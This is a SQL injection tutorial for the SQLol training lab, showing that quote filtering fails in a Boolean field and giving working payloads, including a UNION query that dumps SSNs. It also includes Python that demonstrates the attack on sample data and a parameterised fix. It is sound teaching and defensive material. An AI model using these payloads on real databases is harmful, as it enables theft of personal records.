SQLol Tutorial 2

SQLol Challenge 2 - The Failure of Quote Filters

Many people mistakenly believe that filtering out single quotes is enough to prevent SQL injection. This challenge was created to show that it is not: the input is filtered for single quotes, and you are still tasked with retrieving the social security numbers from the database, as in Challenge 1.

When injecting into a numeric field, the input is placed directly into the query without surrounding quotes, so you never need to break out of a quoted string and the quote filter never has anything to strip. The original query looks like this:

SELECT username FROM users WHERE isadmin = OUR_INPUT_HERE GROUP BY username ORDER BY username ASC

The isadmin column is Boolean, so the application expects the value true or false. Try injecting the string

true

The results show you which users are administrators.

We can perform the same injection attacks as in Challenge 1, except that no quotes are needed. Instead, we simply append SQL after the Boolean value, separated from it by a space; everything after "true" is parsed as part of the query.

Once we have found the table that holds the SSNs (here sqlol.ssn), we can pull all of it using the following injection string:

true union select ssn as username from sqlol.ssn where 1=1

The injected SELECT must return the same number of columns as the original (one), and aliasing ssn as username keeps the column name the application displays. Notice that the results show the SSNs followed by the usernames of the administrators. That is what UNION does: it appends the rows of the second SELECT to the rows of the first (dropping duplicates), and the original query's ORDER BY username ASC then sorts the digit-only SSNs ahead of the alphabetic usernames.
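The following is an added example, not part of the SQLol tutorial or of SQLol's own code. It rebuilds Challenge 2 in an in-memory SQLite database (SQLol itself targets MySQL) with constructed sample rows, and runs the page's injection strings through a lookup that strips single quotes before concatenating the input into the Boolean context, next to a parameterised lookup that actually stops the attack. The second database is attached under the name sqlol so the qualified table name sqlol.ssn in the payload resolves unchanged; the TRUE keyword needs SQLite 3.23 or later.

```python
"""Added example (not part of the SQLol tutorial or its source code).

Rebuilds Challenge 2 in an in-memory SQLite database: a lookup that strips
single quotes and then concatenates the input into a numeric (Boolean)
context, next to the parameterised version that actually stops the attack.
The users and sqlol.ssn rows are constructed sample data.  Requires
SQLite >= 3.23 for the TRUE keyword (any current CPython ships a newer one).
"""
import sqlite3

# The injection strings from the tutorial, verbatim.
ADMINS_ONLY = "true"
ALL_USERS = "true or 1=1"
DUMP_SSNS = "true union select ssn as username from sqlol.ssn where 1=1"

# The challenge's query with the input spliced in without any quotes around it.
QUERY_TEMPLATE = (
    "SELECT username FROM users WHERE isadmin = {} "
    "GROUP BY username ORDER BY username ASC"
)


def build_db() -> sqlite3.Connection:
    """Create users (main schema) and sqlol.ssn (attached schema) with sample rows."""
    conn = sqlite3.connect(":memory:")
    # Attach a second in-memory database under the name the tutorial uses, so
    # the qualified table name sqlol.ssn in the payload resolves unchanged.
    conn.execute("ATTACH DATABASE ':memory:' AS sqlol")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT NOT NULL, isadmin BOOLEAN NOT NULL);
        INSERT INTO users VALUES ('alice', 1), ('bob', 0), ('carol', 1);
        CREATE TABLE sqlol.ssn (name TEXT NOT NULL, ssn TEXT NOT NULL);
        INSERT INTO sqlol.ssn VALUES ('alice', '123-45-6789'),
                                     ('bob',   '987-65-4321');
        """
    )
    return conn


def strip_quotes(user_input: str) -> str:
    """The 'defence' under test: remove every single quote from the input."""
    return user_input.replace("'", "")


def vulnerable_lookup(conn: sqlite3.Connection, user_input: str) -> list:
    """Quote-filter, then build the query by string formatting.

    Still injectable: the Boolean context never needed a quote, so the filter
    has nothing to remove and the appended SQL is parsed as part of the query.
    """
    sql = QUERY_TEMPLATE.format(strip_quotes(user_input))
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn: sqlite3.Connection, user_input: str) -> list:
    """Validate the input as a Boolean and bind it as a parameter.

    The input is only ever a bound value, never SQL text, so no payload reaches
    the parser; anything other than the two legal values is rejected outright.
    """
    if user_input not in ("true", "false"):
        raise ValueError("isadmin must be exactly 'true' or 'false'")
    sql = (
        "SELECT username FROM users WHERE isadmin = ? "
        "GROUP BY username ORDER BY username ASC"
    )
    return [row[0] for row in conn.execute(sql, (user_input == "true",))]


def run_demo() -> dict:
    """Run each payload through both lookups and collect the results."""
    conn = build_db()
    results = {
        "admins": vulnerable_lookup(conn, ADMINS_ONLY),
        "all_users": vulnerable_lookup(conn, ALL_USERS),
        "ssn_dump": vulnerable_lookup(conn, DUMP_SSNS),
        "safe_admins": safe_lookup(conn, ADMINS_ONLY),
    }
    try:
        safe_lookup(conn, DUMP_SSNS)
        results["payload_rejected"] = False
    except ValueError:
        results["payload_rejected"] = True
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Running it shows the three stages of the tutorial against the quote-stripping lookup: "true" lists the administrators, "true or 1=1" lists every user, and the UNION payload returns the two SSNs ahead of the administrator names, exactly the ordering the text describes. The parameterised lookup returns the same administrator list for "true" and refuses the payload before any SQL is built, which is the fix: validate the type of a numeric input and bind it, rather than trying to filter characters out of it.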


Source

This is just a rewritten version of the tutorial2.txt file included with SQLol.

Posted 12-31-12 by Sam Bowne